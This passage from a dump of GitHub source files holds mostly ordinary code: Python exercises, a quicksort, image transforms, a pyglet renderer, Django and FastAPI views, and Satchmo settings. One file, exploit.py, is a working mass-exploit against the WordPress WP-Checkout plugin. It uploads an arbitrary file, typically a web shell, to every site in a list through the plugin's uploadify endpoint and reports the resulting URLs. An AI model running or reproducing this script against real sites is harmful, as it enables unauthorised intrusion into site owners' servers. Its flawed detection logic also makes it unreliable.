format(average, \",.2f\"))\n \n # display the year with the greatest increase\n print(\"The year with the greatest increase is\", ann_change.index(max(ann_change)) +\n START_YEAR, \"with an increase of\", max(ann_change))\n print(\"The year with the smallest increase is\", ann_change.index(min(ann_change)) +\n START_YEAR, \"with an increase of\", min(ann_change))\n \n\n# call the main function\nmain() ","repo_name":"tayfunayazma/Starting_Out_with_Python","sub_path":"chapter_07/q09.py","file_name":"q09.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"20206372610","text":"# partition function handles the work of selecting a pivot element\n# and partitioning the data in the array around the pivot\n# going to return the left partition, the pivot, and the right partition\ndef partition(arr):\n # pick the first element as the pivot element\n pivot = arr[0]\n left = []\n right = []\n\n # iterate through the rest of the array, putting each element in the appropriate bucket\n for x in arr[1:]:\n if x <= pivot:\n left.append(x)\n else:\n right.append(x)\n\n return left, pivot, right\n\n\ndef quicksort(arr):\n # base case\n # if the length of the array is 0\n if len(arr) <= 1:\n return arr\n\n # how do we get closer to our base case?\n left, pivot, right = partition(arr)\n\n return quicksort(left) + [pivot] + quicksort(right)\n\n\narr = [2, 6, 7, 4, 2, 77, 87, -44444, 54, 3]\n\nprint(quicksort(arr))\n","repo_name":"ErikSandvikSEA/guided-algorithms-ii","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19093436305","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 10:30:40 2019\n\n@author: JungWoo\n\"\"\"\n\n#13.(Lists) Given a list of numbers, find and print the elements that appear in it only once. Such elements should be printed in the order in which they occur in the original list.\n#\n#- Example input: 4 3 5 2 5 1 3 5\n#- Example output: 4 2 1\n#\nx = input().split()\ns = sorted(set(x), reverse=True)\nfor i in s:\n if 1 == x.count(i):\n print(i, end=\" \")","repo_name":"qwlake/classes","sub_path":"study-django-likelion/session03-python practice/session03_13.py","file_name":"session03_13.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31129394671","text":"from mmseg.datasets.pipelines.transforms import Resize,RandomCrop,RandomFlip,Normalize,PhotoMetricDistortion,Pad\nimport torchvision.transforms as transforms\nimport torch\nimport numpy as np\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n img = sample['img']\n mask = sample['gt_semantic_seg']\n img = np.array(img).astype(np.float32).transpose((2, 0, 1))\n mask = np.array(mask).astype(np.float32)\n\n img = torch.from_numpy(img).float()\n mask = torch.from_numpy(mask).float()\n\n return {'img': img,\n 'gt_semantic_seg': mask}\n\n\nclass transform_tr(object):\n def __init__(self,args):\n self.composed_transforms=transforms.Compose([\n Resize(img_scale=(2048, 1024), ratio_range=(0.5, 2.0)),\n RandomCrop(crop_size=args.crop_size,cat_max_ratio=0.75),\n RandomFlip(prob=0.5),\n PhotoMetricDistortion(),\n Normalize(**img_norm_cfg),\n Pad(size=args.crop_size,pad_val=0,seg_pad_val=255),\n ToTensor()\n ])\n def __call__(self, sample):\n return self.composed_transforms(sample)\nclass transform_val(object):\n def __init__(self,args):\n self.composed_transforms=transforms.Compose([\n Resize(img_scale=(2048, 1024),keep_ratio=True),\n # RandomFlip(),\n Normalize(**img_norm_cfg),\n ToTensor()\n ])\n def __call__(self, sample):\n return self.composed_transforms(sample)","repo_name":"thanhdh-3030/PT4AL_EXP","sub_path":"dataloaders/mmtransforms.py","file_name":"mmtransforms.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73882370464","text":"# Install pyspellchecker: pip install pyspellchecker\n\nfrom tqdm import tqdm\nfrom spellchecker import SpellChecker\nfrom nltk.tokenize import word_tokenize\nimport argparse\n\nspell = SpellChecker()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--query_file')\nparser.add_argument('--save_to')\nargs = parser.parse_args()\n\nwith open(args.query_file, 'r') as f, \\\n open(args.save_to, 'a+') as wf:\n lines = f.readlines()\n for line in tqdm(lines):\n qid, qry = line.strip().split('\\t')\n words = word_tokenize(qry)\n correct_qry = ''\n for word in words:\n misspelled = spell.unknown([word])\n if len(misspelled) != 0:\n word = spell.correction(word)\n correct_qry += word + \" \"\n wf.write(qid + '\\t' + correct_qry + '\\n')\n\n","repo_name":"ielab/CharacterBERT-DR","sub_path":"data/py_spellchecker.py","file_name":"py_spellchecker.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"38550405220","text":"\"\"\"\nrender tools\n\"\"\"\ntry:\n import pyglet\nexcept ImportError as err:\n raise ImportError('''\n Unable to import pyglet.\n Please install pyglet via 'pip install pyglet'\n ''')\n\ntry:\n from pyglet.gl import *\nexcept ImportError as err:\n raise ImportError('''\n Unable to import gl from pyglet.\n Please install OpenGL.\n ''')\n\nimport math\nimport os\n\nclass Viewer(object):\n def __init__(self, width=640, height=480, caption=\"Robotics Notebook/Path Planning\", icon_file=\"icon.png\"):\n self.width = width\n self.height = height\n platform = pyglet.window.get_platform()\n display = platform.get_default_display()\n # screen = display.get_default_screen()\n config = Config(double_buffer=True)\n self.window = pyglet.window.Window(width=int(width), height=int(height), display=display,\n config=config, caption=caption)\n icon = pyglet.image.load(os.path.dirname(__file__) + '/' + icon_file)\n self.window.set_icon(icon)\n self.is_open = True\n self.window.on_close = self.close_viewer\n self.window.on_draw = self.draw\n self.geoms = []\n\n def render(self):\n glClearColor(1,1,1,1)\n self.window.clear()\n self.window.switch_to()\n self.window.dispatch_events()\n self.window.dispatch_event('on_draw')\n self.window.flip()\n\n def add_geometry(self, type, **attrs):\n if type == 'point':\n self.geoms.append(Point(**attrs))\n elif type == 'line':\n self.geoms.append(Line(**attrs))\n\n def draw(self):\n self.draw_point(pos=(400, 300), color=(100, 0, 0), pointSize=3)\n self.draw_line(start=(200, 200), end=(400, 400), color=(0, 100, 0), lineWidth=3)\n self.draw_circle(pos=(100,350), radius=50, res=50, color=(100, 100, 0))\n self.draw_circle(pos=(100, 50), radius=30, res=10, filled=False, lineWidth=5)\n self.draw_polygon(points=((200, 50), (200, 250), (400, 250), (400, 50)), close=True, lineWidth=3, color=(0, 0, 100))\n self.draw_polygon(points=((500, 250), (500, 350), (600, 350), (600, 250)), filled=True, color=(0, 0, 100))\n\n def draw_point(self, pos, **attrs):\n point = Point(pos=pos)\n if 'color' in attrs:\n point.set_color(*attrs['color'])\n if 'pointSize' in attrs:\n point.set_pointSize(attrs['pointSize'])\n point.render()\n\n def draw_line(self, start, end, **attrs):\n line = Line(start=start, end=end)\n if 'color' in attrs:\n line.set_color(*attrs['color'])\n if 'lineWidth' in attrs:\n line.set_lineWidth(attrs['lineWidth'])\n line.render()\n\n def draw_circle(self, pos, radius, **attrs):\n circle = Circle(pos=pos, radius=radius)\n if 'color' in attrs:\n circle.set_color(*attrs['color'])\n if 'res' in attrs:\n circle.set_res(attrs['res'])\n if 'filled' in attrs:\n circle.set_filled(attrs['filled'])\n if 'lineWidth' in attrs:\n circle.set_lineWidth(attrs['lineWidth'])\n circle.render()\n\n def draw_polygon(self, points, **attrs):\n polygon = Polygon(points=points)\n if 'color' in attrs:\n polygon.set_color(*attrs['color'])\n if 'close' in attrs:\n polygon.set_close(attrs['close'])\n if 'filled' in attrs:\n polygon.set_filled(attrs['filled'])\n if 'lineWidth' in attrs:\n polygon.set_lineWidth(attrs['lineWidth'])\n polygon.render()\n\n def close_viewer(self):\n self.is_open = False\n\n\nclass Attr(object):\n def enable(self):\n raise NotImplementedError\n def disable(self):\n pass\n\nclass Color(Attr):\n def __init__(self, *color):\n self.color = color\n def enable(self):\n glColor3b(*self.color)\n\nclass LineWidth(Attr):\n def __init__(self, width):\n self.width = width\n def enable(self):\n glLineWidth(self.width)\n\nclass PointSize(Attr):\n def __init__(self, size):\n self.size = size\n def enable(self):\n glPointSize(self.size)\n\nclass Geom(object):\n def __init__(self):\n self._color = Color(0, 0, 0)\n self.attrs = [self._color]\n def render(self):\n for attr in self.attrs:\n attr.enable()\n self.render1()\n for attr in self.attrs:\n attr.disable()\n def render1(self):\n raise NotImplementedError\n def add_attr(self, attr):\n self.attrs.append(attr)\n def set_color(self, r, g, b):\n self._color.color = (r, g, b)\n\nclass Point(Geom):\n def __init__(self, pos=(0,0), size=3, color=None):\n Geom.__init__(self)\n self._pos = pos\n self._pointSize = PointSize(size=size)\n self.add_attr(self._pointSize)\n if color is not None:\n self.set_color(*color)\n def render1(self):\n glBegin(GL_POINTS)\n glVertex2d(*self._pos)\n glEnd()\n def set_pointSize(self, size):\n self._pointSize.size = size\n\nclass Line(Geom):\n def __init__(self, start, end, width=3, color=None):\n Geom.__init__(self)\n self._start = start\n self._end = end\n self._lineWidth = LineWidth(width=width)\n self.add_attr(self._lineWidth)\n if color is not None:\n self.set_color(*color)\n def render1(self):\n glBegin(GL_LINES)\n glVertex2d(*self._start)\n glVertex2d(*self._end)\n glEnd()\n def set_lineWidth(self, width):\n self._lineWidth.width = width\n\nclass Circle(Geom):\n def __init__(self, pos, radius, res=30, filled=True, width=3, color=None):\n Geom.__init__(self)\n self._pos = pos\n self._radius = radius\n self._res = res\n self._filled = filled\n self._lineWidth = LineWidth(width=width)\n if color is not None:\n self.set_color(*color)\n def render1(self):\n if self._filled:\n glBegin(GL_POLYGON)\n else:\n glBegin(GL_LINE_LOOP)\n for i in range(max(self._res, 5)):\n angle = 2*math.pi/self._res*i\n glVertex2d(self._pos[0] + self._radius * math.cos(angle), self._pos[1] + self._radius * math.sin(angle))\n glEnd()\n def set_pos(self, pos):\n self._pos = pos\n def set_radius(self, radius):\n self._radius = radius\n def set_res(self, res):\n self._res = res\n def set_filled(self, filled):\n self._filled = filled\n def set_lineWidth(self, width):\n self._lineWidth.width = width\n\nclass Polygon(Geom):\n def __init__(self, points, close=True, filled=False, width=3, color=None):\n Geom.__init__(self)\n self._points = points\n self._close = close\n self._filled = filled\n self._lineWidth = LineWidth(width=width)\n self.add_attr(self._lineWidth)\n if color is not None:\n self.set_color(*color)\n def render1(self):\n if self._filled:\n if len(self._points) > 4:\n glBegin(GL_POLYGON)\n elif len(self._points) == 4:\n glBegin(GL_QUADS)\n else:\n glBegin(GL_TRIANGLES)\n else:\n glBegin(GL_LINE_LOOP if self._close else GL_LINE_STRIP)\n for point in self._points:\n glVertex2d(*point)\n glEnd()\n def set_close(self, close):\n self._close = close\n def set_filled(self, filled):\n self._filled = filled\n def set_lineWidth(self, width):\n self._lineWidth.width = width\n\n\nif __name__ == '__main__':\n viewer = Viewer()\n while viewer.is_open:\n viewer.render()","repo_name":"0aqz0/Robotics-Notebook","sub_path":"PathPlanning/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"9920571277","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy.exc import IntegrityError\nfrom models import Student\nfrom random import randint\n\n\ndef insert_student(db: Session, student: Student):\n while True:\n try:\n student_id = randint(10000000, 99999999)\n student.studentId = student_id\n db.add(student)\n db.flush()\n db.commit()\n return student\n except IntegrityError:\n pass\n\n\ndef get_students(db: Session, order_by: str = None):\n students = db.query(Student)\n if order_by:\n if order_by in {\"last_name\", \"age\", \"grade\"}:\n if order_by == \"last_name\":\n students = students.order_by(Student.lastName.asc())\n elif order_by == \"age\":\n students = students.order_by(Student.dateOfBirth.desc())\n elif order_by == \"grade\":\n students = students.order_by(Student.schoolGrade.desc())\n return students.all()\n\n\ndef get_student(db: Session, student_id: int):\n return db.query(Student).filter_by(studentId=student_id).first()\n\n\ndef delete_student(db: Session, student_id: int = -1, student: Student = None):\n if student_id > 0:\n raise NotImplementedError(\"For now deletion by id is not supported yet\")\n elif not student:\n raise ValueError(\"Student object is required\")\n db.delete(student)\n db.flush()\n db.commit()\n\n\ndef delete_students(db: Session):\n db.query(Student).delete()\n db.flush()\n db.commit()\n\n\ndef count_students(db):\n return db.query(Student).count()\n","repo_name":"sergey-misuk-work/students","sub_path":"app/services/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44432956401","text":"# This file is used to store your site specific settings\n# for database access.\n# It also store satchmo unique information\n#\n#\n# Modify this file to reflect your settings, then rename it to \n# local_settings.py\n#\n# This file is helpful if you have an existing Django project. \n# These are specific things that Satchmo will need.\n# you MUST make sure these settings are imported from your project settings file!\n\nimport os\nimport logging\nDIRNAME = os.path.dirname(__file__)\n\n# This is useful, since satchmo is not the \"current directory\" like load_data expects.\n# SATCHMO_DIRNAME = ''\n\n# Only set these if Satchmo is part of another Django project\n#SITE_NAME = ''\n#ROOT_URLCONF = ''\n#MEDIA_ROOT = os.path.join(DIRNAME, 'static/')\n#DJANGO_PROJECT = 'Your Main Project Name'\n#DJANGO_SETTINGS_MODULE = 'main-project.settings'\n\n# Make sure Satchmo templates are added to your existing templates\n# TEMPLATE_DIRS += (\n# os.path.join(SATCHMO_DIRNAME, \"templates\"),\n#)\n\n# Make sure Satchmo context processor is called\n# TEMPLATE_CONTEXT_PROCESSORS += ('satchmo.shop.context_processors.settings')\n\nDATABASE_NAME = ''\nDATABASE_PASSWORD = ''\nDATABASE_USER = ''\nSECRET_KEY = ''\n\n##### For Email ########\n# If this isn't set in your settings file, you can set these here\n#EMAIL_HOST = 'host here'\n#EMAIL_PORT = 587\n#EMAIL_HOST_USER = 'your user here'\n#EMAIL_HOST_PASSWORD = 'your password'\n#EMAIL_USE_TLS = True\n\n#### Satchmo unique variables ####\n#This is the base url for the shop. Only include a leading slash\n#examples: '/shop' or '/mystore'\n#If you want the shop at the root directory, set SHOP_BASE = ''\nSHOP_BASE = '/shop'\n\n#These are used when loading the test data\nSITE_DOMAIN = \"example.com\"\nSITE_NAME = \"My Site\"\n\n# These can override or add to the default URLs\nfrom django.conf.urls.defaults import *\nURLS = patterns('',\n)\nSHOP_URLS = patterns('satchmo.shop.views',\n# (r'^checkout/pay/$', 'paypal.checkout_step2.pay_ship_info', {'SSL': False}, 'satchmo_checkout-step2'),\n# (r'^checkout/confirm/$', 'paypal.checkout_step3.confirm_info', {'SSL': False}, 'satchmo_checkout-step3'),\n)\n\n# register custom external newsletter modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.newsletter.autoresponder',]\nCUSTOM_NEWSLETTER_MODULES = []\n\n# register custom external payment modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.payment.wondercharge',]\nCUSTOM_PAYMENT_MODULES = []\n\n# register custom external shipping modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.shipping.fancyshipping',]\nCUSTOM_SHIPPING_MODULES = []\n\n# register custom external product modules by listing their modules here\n# ex: CUSTOM_NEWSLETTER_MODULES = ['client.product.myproducttype',]\nCUSTOM_PRODUCT_MODULES = []\n\n# a cache backend is required. Do not use locmem, it will not work properly at all in production\n# Preferably use memcached, but file or DB is OK. File is faster, I don't know why you'd want to use\n# db, personally. See: http://www.djangoproject.com/documentation/cache/ for help setting up your\n# cache backend\n#CACHE_BACKEND = \"memcached://127.0.0.1:11211/\"\nCACHE_BACKEND = \"file:///var/tmp/django_cache\"\nCACHE_TIMEOUT = 60*5\n\n# Locale path settings. Needs to be set for Translation compilation.\n# It can be blank\n# LOCALE_PATHS = \"\"\n\n#Configure logging\nLOGDIR = DIRNAME\nLOGFILE = \"satchmo.log\"\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename=os.path.join(LOGDIR, LOGFILE),\n filemode='w')\n\n# define a Handler which writes INFO messages or higher to the sys.stderr\nfileLog = logging.FileHandler(os.path.join(LOGDIR, LOGFILE), 'w')\nfileLog.setLevel(logging.DEBUG)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(asctime)s %(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nfileLog.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(fileLog)\nlogging.getLogger('caching').setLevel(logging.INFO)\nlogging.info(\"Satchmo Started\")\n","repo_name":"davemerwin/satchmo","sub_path":"satchmo-0.6.0/satchmo/local_settings-customize.py","file_name":"local_settings-customize.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"17180448040","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\r\n self._candidates = candidates\r\n self._len = len(candidates)\r\n self.ret = []\r\n self.recursion(0, target, [])\r\n return self.ret\r\n\r\n def recursion(self, start, left, current_list):\r\n if start >= self._len:\r\n return\r\n self.recursion(start + 1, left, current_list[:]) # 该位置不取\r\n current_val = self._candidates[start]\r\n left = left - current_val\r\n while left > 0:\r\n current_list.append(current_val)\r\n self.recursion(start + 1, left, current_list[:]) # 该位置分别取1~多次, 再进入下个位置, 即DFS\r\n left = left - current_val\r\n if left == 0:\r\n current_list.append(current_val)\r\n self.ret.append(current_list)\r\n\r\n\r\ndef test():\r\n def assert_equal_list(l1: List[List[int]], l2: List[List[int]]):\r\n print(f'l1={l1}\\nl2={l2}')\r\n assert len(l1) == len(l2)\r\n assert set(tuple(e) for e in l1) == set(tuple(e) for e in l2)\r\n print()\r\n\r\n s = Solution()\r\n\r\n candidates = [2, 3, 6, 7]\r\n target = 7\r\n expected = [\r\n [7],\r\n [2, 2, 3]\r\n ]\r\n assert_equal_list(s.combinationSum(candidates, target), expected)\r\n\r\n candidates = [2, 3, 5]\r\n target = 8\r\n expected = [\r\n [2, 2, 2, 2],\r\n [2, 3, 3],\r\n [3, 5]\r\n ]\r\n assert_equal_list(s.combinationSum(candidates, target), expected)\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n","repo_name":"miniyk2012/leetcode","sub_path":"leetcode_projects/leetcode_39/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"512866471","text":"# Filedata\nimport colorama # pip3 install colorama\nfrom colorama import Fore as F\nimport requests as r # pip3 install requests\nimport argparse as arg\nimport os as sistema\nimport sys\nsistema.system('cls' if sistema.name == 'nt' else 'reset')\n\ndef arruma(url):\n\tif url[-1] != \"/\":\n\t\turl = url + \"/\"\n\tif url[:7] != \"http://\" and url[:8] != \"https://\":\n\t\turl = \"http://\" + url\n\treturn url\nuser_agent = {'User-agent': 'Mozilla/5.0'}\n\nindex = r\"\"\"{}\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{}\n__ __ _ _____ \n\\ \\ / / | | / ____| \n \\ \\_/ / _ _ __ | | _____ _ __ ___| | _ __ _____ __\n \\ / | | | '_ \\| |/ / _ \\ '__/ __| | | '__/ _ \\ \\ /\\ / /\n | || |_| | | | | < __/ | \\__ \\ |____| | | __/\\ V V / \n |_| \\__,_|_| |_|_|\\_\\___|_| |___/\\_____|_| \\___| \\_/\\_/ \n {}Wordpress Plugin \"WP-Checkout\" mass exploit \n\n{}Autor: {}Supr3m0 (Yunkers Crew)\n{}Github: {}www.github.com/2inf3rnal/\n{}Skype: {}inf3rnal.king\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\"\"\".format(F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE)\n\nmanual = \"\"\"{}--lista {}Lista com os sites.\n{}--arquivo {}Arquivo que será upado no site.\n{}--threads {}Quantidade de requisições (Default = 10)\n\n{}Use: {}python3 {} --lista --arquivo --threads 5\"\"\".format(F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, F.CYAN, F.WHITE, sys.argv[0])\n\nif len(sys.argv) == 1:\n\tprint(index)\n\tprint(manual)\n\texit()\n\nparser = arg.ArgumentParser(description = \"By Supr3m0\")\nparser.add_argument(\"--lista\", \"-l\", action='store')\nparser.add_argument(\"--arquivo\", \"-a\", action='store')\nparser.add_argument(\"--threads\", \"-t\", action='store', type = int, default = 10)\nparam = parser.parse_args()\n\nif not param.lista:\n\tprint(\"{}[-] {}Insira a lista com os devidos sites!\".format(F.RED, F.WHITE))\n\texit()\nif not param.arquivo:\n\tprint(\"{}[-] {}Insira o arquivo que será upado no site!\".format(F.RED, F.WHITE))\n\texit()\n\nprint(index)\nprint(\"{}[+] {}Lista de sites: {}\".format(F.CYAN, F.WHITE, param.lista))\nprint(\"{}[+] {}Arquivo que será upado: {}\".format(F.CYAN, F.WHITE, param.arquivo))\nprint(\"\\n{}[...] {}Lendo lista de sites...\".format(F.CYAN, F.WHITE))\n\ntry:\n\tlista = open(param.lista, \"r\")\n\tlista = lista.readlines()\n\tlista = [site.replace(\"\\n\", \"\") for site in lista]\n\tarquivo = open(param.arquivo, \"rb\")\nexcept Exception as err:\n\tprint(\"{}[-] {}Algum erro aconteceu ao tentar abrir os arquivos {} / {}\".format(F.CYAN, F.WHITE, param.lista, param.arquivo))\n\texit()\n\nprint(\"{}[+] {}Total de sites: {}\".format(F.CYAN, F.WHITE, str(len(lista))))\nprint(\"\\n{}[...] {}Iniciando exploração em massa!\".format(F.CYAN, F.WHITE))\n\npayload = {\"Filedata\" : arquivo}\ntry:\n\tfor site in lista:\n\t\turl = arruma(site) + \"wp-content/plugins/wp-checkout/vendors/uploadify/upload.php\"\n\t\tcheca = r.get(url)\n\t\tif checa.status_code != 404 and not \"404\" or \"not found\" or \"internal\" or \"500\" or \"403\" in checa.text:\n\t\t\tprint(\"{}\\n[!] {}O site {} pode está vulnerável!\".format(F.GREEN, F.WHITE, site))\n\t\t\tprint(\"{} [...] {}Inserindo payload...\".format(F.GREEN, F.WHITE))\n\t\t\tenvia = r.post(url, files=payload)\n\t\t\tif not \"404\" or \"not found\" or \"internal\" or \"500\" or \"403\" in envia.text:\n\t\t\t\tprint(\"{} [...] {}Payload enviado com sucesso, verificando se o arquivo foi realmente upado...\".format(F.GREEN, F.WHITE))\n\t\t\t\tshell = arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text\n\t\t\t\tshell = r.get(shell)\n\t\t\t\tif shell.status_code == 200:\n\t\t\t\t\tprint(\"{} [+] {}Arquivo enviada com sucesso: {}\\n\".format(F.GREEN, F.WHITE, arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"{} [-] {}Não encontrei a shell.. -> {}\\n\".format(F.RED, F.WHITE,arruma(site) + \"wp-content/uploads/wp-checkout/uploadify/\" + envia.text))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(\"{} [-] {}Erro ao enviar o payload...\\n\".format(F.RED, F.WHITE))\n\t\t\t\tcontinue\n\t\telse:\n\t\t\tcontinue\nexcept KeyboardInterrupt:\n\texit(\"bye\")\nprint(\"\\n{}[FINISH]{}\".format(F.CYAN, F.WHITE))\n","repo_name":"2inf3rnal/wp-checkout-exploit","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"pt","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} +{"seq_id":"72685381984","text":"from Naive338 import Solution as Naive\nfrom Naive2_338 import Solution as Naive2\n\ntestcases = [\n (2, [0, 1, 1]),\n (5, [0, 1, 1, 2, 1, 2]),\n]\n\n\ndef test_naive():\n for n, ans in testcases:\n assert Naive().countBits(n) == ans\n\ndef test_naive2():\n for n, ans in testcases:\n assert Naive2().countBits(n) == ans\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/BitManipulation/CountingBits/test_338.py","file_name":"test_338.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"26934396108","text":"import json\nimport time\nimport traceback\n\nfrom django.core.paginator import Paginator, PageNotAnInteger, InvalidPage\n\nfrom django.db import transaction\nfrom django.http import JsonResponse\nfrom django.shortcuts import render,HttpResponse\n\n\nfrom courseapp.models import TCategory\nfrom courseapp.models import Title\n\n# Create your views here.\n\n#渲染主界面\ndef home(request):\n username = request.session.get('username')\n title = Title.objects.all()\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n num = int(request.GET.get('num', 1))\n pagtor = Paginator(title, per_page=5)\n if num < 1:\n num = 1\n elif num > pagtor.num_pages:#最后一页\n num = pagtor.num_pages\n num = str(num)\n page = pagtor.page(num)\n return render(request,'courseapp/index.html',{'username':username,'page':page,'titles':title,'course':course,'course_type':course_type})\n\n\n\ndef home1(request):\n username = request.session.get('username')\n id = request.GET.get('id')\n level = request.GET.get('level')\n course_type = TCategory.objects.filter(level=2)\n course = TCategory.objects.filter(level=1)\n list = []\n list1 = []\n if level =='2':\n id = int(id)\n data = TCategory.objects.filter(id=id)\n for i in data:\n list.append(i)\n pt = Title.objects.filter(cate__id=i.id) # 查文章对象\n for i in pt:\n list1.append(i)\n else:\n id = int(id)\n data = TCategory.objects.filter(parnt_elevel=id)\n for i in data:\n list.append(i)\n pt = Title.objects.filter(cate__id=i.id) # 查文章对象\n for i in pt:\n list1.append(i)\n\n num = int(request.GET.get('num', 1))\n pagtor = Paginator(list1, per_page=5)\n if num < 1:\n num = 1\n elif num > pagtor.num_pages:\n num = pagtor.num_pages\n page = pagtor.page(num)\n return render(request, 'courseapp/pythonBase.html', {'username':username,'id': id,'page': page,'level': level,\n 'list1': list1,'list': list,'course':course,'course_type':course_type })\n\n\ndef course_add(request):\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n return render(request,'courseapp/addCourse.html',{'course':course,'course_type':course_type})\n\n#添加课程/课程分类\ndef course_add1(request):\n title = request.POST.get('name')\n level = request.POST.get('title')\n cate_sel = request.POST.get('cate_sel') #获取课程名称\n try:\n level = int(level)\n #添加课程分类\n if level == 2:\n u = TCategory.objects.filter(titles=cate_sel)\n with transaction.atomic():\n category = TCategory(titles=title,level=level,parnt_elevel=u[0].id)\n category.save()\n data = TCategory.objects.get(titles=title)\n print(data,999)\n return HttpResponse('添加成功!'+str(data.id)+\"!\"+str(level))\n else:\n #添加课程\n with transaction.atomic():\n category = TCategory(titles=title, level=level,)\n category.save()\n data = TCategory.objects.get(titles=title)\n return HttpResponse('添加成功!'+str(data.id)+\"!\"+str(level))\n except:\n traceback.print_exc()\n return HttpResponse('添加失败!')\n\n#渲染添加课程界面\ndef course_add_title(request):\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n return render(request, 'courseapp/addArticle.html', {'course': course, 'course_type': course_type})\n\n\ndef my_default(t):\n if isinstance(t, Title):\n return {'id': t.id, 'title': t.title, 'content': t.content, 'publish_time': t.publish_time.strftime('%Y-%m-%d %H-%M-%S'),'count':t.count,'cate_id':t.cate_id}\n if isinstance(t, TCategory):\n return {'id': t.id, 'titles': t.titles, 'level': t.level, 'parnt_elevel': t.parnt_elevel}\n\n#查询二级目录返回json对象\ndef addAritcle(request):\n course_id = request.POST.get(\"course\")\n course = TCategory.objects.filter(parnt_elevel=course_id)\n if course:\n return JsonResponse({\"course\":list(course)},json_dumps_params={\"default\":my_default})\n return HttpResponse('error!')\n\n#添加课程逻辑\ndef addAritcle_btn(request):\n title = request.POST.get(\"title\")\n # course_sel = request.POST.get(\"course_sel\")#所属课程\n cate_sel = request.POST.get(\"cate_sel\")#所属课程分类\n id = TCategory.objects.filter(titles=cate_sel)\n publish_time = request.POST.get(\"time\")\n txt = request.POST.get(\"txt\")\n try:\n if not publish_time:\n publish_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n t = Title(title=title,content=txt,count=0,publish_time=publish_time,cate_id=id[0].id)\n t.save()\n data = Title.objects.filter(cate_id=id[0].id)\n if len(data)<5:\n num = 1\n else:\n if len(data)//5 == 0:\n num = int(len(data)/5)\n else:\n num = int(len(data)/5)+1\n return HttpResponse(\"添加成功!\"+str(id[0].id)+\"!\"+str(id[0].level)+\"!\"+str(num))\n except:\n traceback.print_exc()\n return HttpResponse(\"添加失败!\")\n\n#删除\ndef delete(request):\n del_id = request.POST.get(\"del_id\")\n id = request.POST.get(\"id\")\n level = request.POST.get(\"level\")\n num = request.POST.get(\"num\")\n title = Title.objects.filter(id=del_id)\n title.delete()\n if id and level:\n print(111)\n return HttpResponse(\"删除成功!\" + num+\"!\"+ id+\"!\"+ level)\n return HttpResponse(\"删除成功!\" + num)\n\n#更新文章\ndef update(request):\n id=request.GET.get('id')\n if isinstance(id, str):\n id = int(id)\n request.session['id'] = id\n data = Title.objects.get(id=id)#文章\n data1 = TCategory.objects.get(id=data.cate_id) #查文章的二级目录\n data2 = TCategory.objects.get(id=data1.parnt_elevel)#查文章的一级目录\n course = TCategory.objects.filter(level=1)\n course_type = TCategory.objects.filter(level=2)\n return render(request, 'courseapp/update.html', {'data1': data1,'data2': data2,'course': course, 'course_type': 